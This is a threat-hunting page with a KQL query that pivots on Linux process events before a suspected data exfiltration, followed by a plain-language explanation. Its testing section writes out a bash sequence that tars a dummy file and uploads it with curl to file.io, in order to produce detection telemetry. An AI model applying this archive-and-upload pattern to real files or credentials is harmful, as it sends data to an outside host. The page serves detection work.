KQL Search

Query Details

HomeAI ToolsDevice Query

Linux User Activity Leading Up To Exfiltration

Query

### Pivot B – User activity leading up to exfiltration

## Follow‑up pivots (recommended)

Use this when pivoting from the **Linux – Archive Command Followed by Upload Egress** query. They are strongly recommended to understand scope and intent.

Use this pivot to identify:

* Pre‑exfiltration reconnaissance
* Credential access
* Script execution
* Operator behaviour

```kql
// Update DeviceName and time window as required
DeviceProcessEvents
| where DeviceName =~ "DeviceNameHere"
| where Timestamp between (datetime(2026-01-30T14:50:00Z) .. datetime(2026-01-30T15:10:00Z))
| project Timestamp, AccountName, FileName, ProcessCommandLine, InitiatingProcessFileName
| order by Timestamp desc
```

---

## Testing and validation guidance

To safely generate telemetry for this hunt:

```bash
cd /tmp
echo test > a.txt
tar -czf test-exfil.tgz a.txt
curl -F [email protected] https://file.io/?expires=1d
```

This sequence reliably produces:

* Archive creation intent
* Outbound upload activity
* Correlated results in the hunt

Explanation

This query is designed to help security analysts investigate user activity on a Linux device that might indicate data exfiltration. Here's a simple breakdown of what the query does:

  1. Purpose: It's used to identify suspicious activities that might have occurred before data was exfiltrated from a device. This includes looking for reconnaissance actions, attempts to access credentials, script executions, and general operator behavior.

  2. How it Works:

    • The query looks at process events on a specific device (you need to replace "DeviceNameHere" with the actual device name you're investigating).
    • It focuses on a specific time window (from January 30, 2026, 14:50 to 15:10 UTC) to narrow down the search to relevant events.
    • It retrieves and displays information such as the timestamp of the event, the account name involved, the file name, the command line used to execute the process, and the name of the initiating process.
    • The results are ordered by the most recent events first.

  3. Testing and Validation:

    • A sample script is provided to simulate the creation of an archive and its upload, which can be used to test and validate the detection capabilities.
    • This script creates a test file, archives it, and uploads it to a file-sharing service, mimicking potential exfiltration behavior.

Overall, this query and the accompanying script help analysts understand the scope and intent of potential data exfiltration activities by examining related user actions on a Linux device.

Details

Nathan Hutchinson profile picture

Nathan Hutchinson

Released: February 2, 2026

Tables

DeviceProcessEvents

Keywords

DeviceProcessEventsTimestampAccountNameFileNameProcessCommandLineInitiatingProcessFileName

Operators

=~betweenprojectorder by

Actions